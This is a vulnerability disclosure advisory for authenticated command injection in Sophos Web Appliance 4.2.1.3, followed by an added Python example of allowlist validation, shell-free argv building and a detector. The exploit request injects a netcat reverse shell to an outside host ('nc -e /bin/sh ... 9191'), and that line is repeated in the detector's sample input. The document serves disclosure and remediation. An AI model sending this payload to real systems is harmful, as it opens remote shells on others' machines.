Sophos Web Appliance Remote Code Execution

2016-11-03T00:00:00
ID KL-001-2016-009
Type korelogic
Reporter Matt Bergin (@thatguylevel)
Modified 2016-11-03T00:00:00

Description

Title: Sophos Web Appliance Remote Code Execution
Advisory ID: KL-001-2016-009
Publication Date: 2016.11.03
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt

  1. Vulnerability Details

    Affected Vendor: Sophos
    Affected Product: Web Appliance
    Affected Version: v4.2.1.3
    Platform: Embedded Linux
    CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'), CWE-88: Argument Injection or Modification
    Impact: Remote Code Execution
    Attack vector: HTTP

  2. Vulnerability Description

    An authenticated user of any privilege can execute arbitrary system commands as the non-root webserver user.

  3. Technical Description

    Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as:

    POST /index.php?c=logs HTTP/1.1
    Host: [redacted]
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    DNT: 1
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.6.1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 305
    Connection: close

    STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timelinenc%20-e%20/bin/sh%20[redacted]%209191&search=test&sort=time&multiplier=1&start=&end=&direction=1

    HTTP/1.1 200 OK
    Date: Tue, 10 May 2016 15:35:05 GMT
    Server: Apache
    Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
    Pragma: no-cache
    X-Frame-Options: sameorigin
    X-Content-Type-Options: nosniff
    Connection: close
    Content-Type: text/html; charset=utf-8
    Content-Length: 207

    {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10 4:35 PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}

    --

    The vulnerable parameters are: by, request_id, and txt_filter_domain.

    That request launches the following process on the SWA:

    1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c /opt/perl/bin/salp-generate-report.pl --report=Filter --res=- --type=user_timelinenc -e /bin/sh [redacted] 9191 --filter='dGVzdA==' --start='2016/05/10' --end='2016/05/10' --action='' --sid=590fca17b230e8cdba0394cfa28ef2eb

    From the shell launched via netcat:

    id;uname -a;uptime
    uid=1000(spiderman) gid=1000(spiderman) groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)
    Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
     15:52:34 up  4:26,  0 users,  load average: 0.11, 0.12, 0.15
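    The process listing above shows the root cause: the value of the `by` parameter is concatenated into a command string that is handed to `sh -c`, so a value containing whitespace becomes additional arguments to salp-generate-report.pl (here an extra `-e /bin/sh ... 9191`). The following is an added example, not code from KoreLogic or Sophos, showing the two controls that close this class of bug on the web-application side: reject any report type that is not on an allowlist, and build the argument vector as a list so that each form value is exactly one argv element regardless of its contents. It also includes a small detector that flags the three parameters named in this advisory when their value is not a plain token, which is useful for log review. The parameter names and the script flags are taken from the advisory; the allowlist of report types is a constructed assumption, as is the sample body (the advisory's own request body with `[redacted]` preserved).

```python
"""Added example (not the appliance's code): allowlist validation and shell-free
process launch for the report path described in the advisory, plus a detector
for the three parameters it names. ALLOWED_BY is a constructed assumption."""
import re
import shlex
import subprocess
from urllib.parse import parse_qs

# Parameters the advisory identifies as reaching the command line unsafely.
UNSAFE_PARAMS = ("by", "request_id", "txt_filter_domain")

# Constructed allowlist of report types; the appliance's real set is not on the page.
ALLOWED_BY = frozenset({"user_timeline", "user", "domain"})

# A legitimate value for these parameters is a short token with no whitespace or
# shell metacharacters. Anything else is flagged for review.
_SAFE_TOKEN = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

# The POST body from the advisory's request (constructed sample input for the detector).
SAMPLE_BODY = (
    "STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays"
    "&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM"
    "&txt_filter_user_timeline=test&action=search"
    "&by=user_timelinenc%20-e%20/bin/sh%20[redacted]%209191"
    "&search=test&sort=time&multiplier=1&start=&end=&direction=1"
)


def flag_suspicious_params(body: str) -> list:
    """Return (name, value) pairs for the three advisory parameters whose decoded
    value is not a plain token. Suitable for running over captured request bodies."""
    form = parse_qs(body, keep_blank_values=True)
    flagged = []
    for name in UNSAFE_PARAMS:
        for value in form.get(name, []):
            if not _SAFE_TOKEN.match(value):
                flagged.append((name, value))
    return flagged


def validate_by(value: str) -> str:
    """Accept only an allowlisted report type; the injected value is refused before
    any process is built, which is the primary fix for CWE-78/CWE-88 here."""
    if value not in ALLOWED_BY:
        raise ValueError(f"unsupported report type: {value!r}")
    return value


def build_report_argv(by: str, filter_b64: str, start: str, end: str, sid: str) -> list:
    """Build the argument vector as a list (flags mirror the ps output in the advisory).
    Each form value is exactly one argv element, so spaces or a leading '-' inside it
    can never turn into a separate option, unlike 'sh -c' with a concatenated string."""
    return [
        "/opt/perl/bin/salp-generate-report.pl",
        "--report=Filter",
        "--res=-",
        f"--type={validate_by(by)}",
        f"--filter={filter_b64}",
        f"--start={start}",
        f"--end={end}",
        "--action=",
        f"--sid={sid}",
    ]


def run_report(argv: list) -> subprocess.CompletedProcess:
    """Launch the report without a shell: list form, no shell=True, no string command."""
    return subprocess.run(argv, capture_output=True, text=True, check=False)


def argv_to_shell(argv: list) -> str:
    """If a shell really is unavoidable, quote every element individually so the
    command line round-trips to the same argv instead of being re-split on spaces."""
    return shlex.join(argv)


if __name__ == "__main__":
    # Detector over the advisory's request body, then the hardened builder.
    print(flag_suspicious_params(SAMPLE_BODY))
    print(build_report_argv("user_timeline", "dGVzdA==", "2016/05/10", "2016/05/10",
                            "590fca17b230e8cdba0394cfa28ef2eb"))
```

    Running the detector over the advisory's request body flags only the `by` parameter, with its decoded value `user_timelinenc -e /bin/sh [redacted] 9191`; the same value raises ValueError in validate_by. The argv builder is the shape of fix that removes the injection regardless of the validator, because subprocess passes the list straight to execve with no shell parsing in between.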

  4. Mitigation and Remediation Recommendation

    The vendor has issued a fix for this vulnerability in Version 4.3 of SWA. Release notes available at:

    http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html

  5. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

  6. Disclosure Timeline

    2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos.
    2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
    2016.09.28 - KoreLogic requests status update.
    2016.09.28 - Sophos informs KoreLogic that an update including a fix for this vulnerability will be available near the end of October.
    2016.10.13 - Sophos informs KoreLogic that the update was released to a limited customer base and is expected to be distributed at-large over the following week.
    2016.11.03 - Public disclosure.

  7. Proof of Concept

    See 3. Technical Description.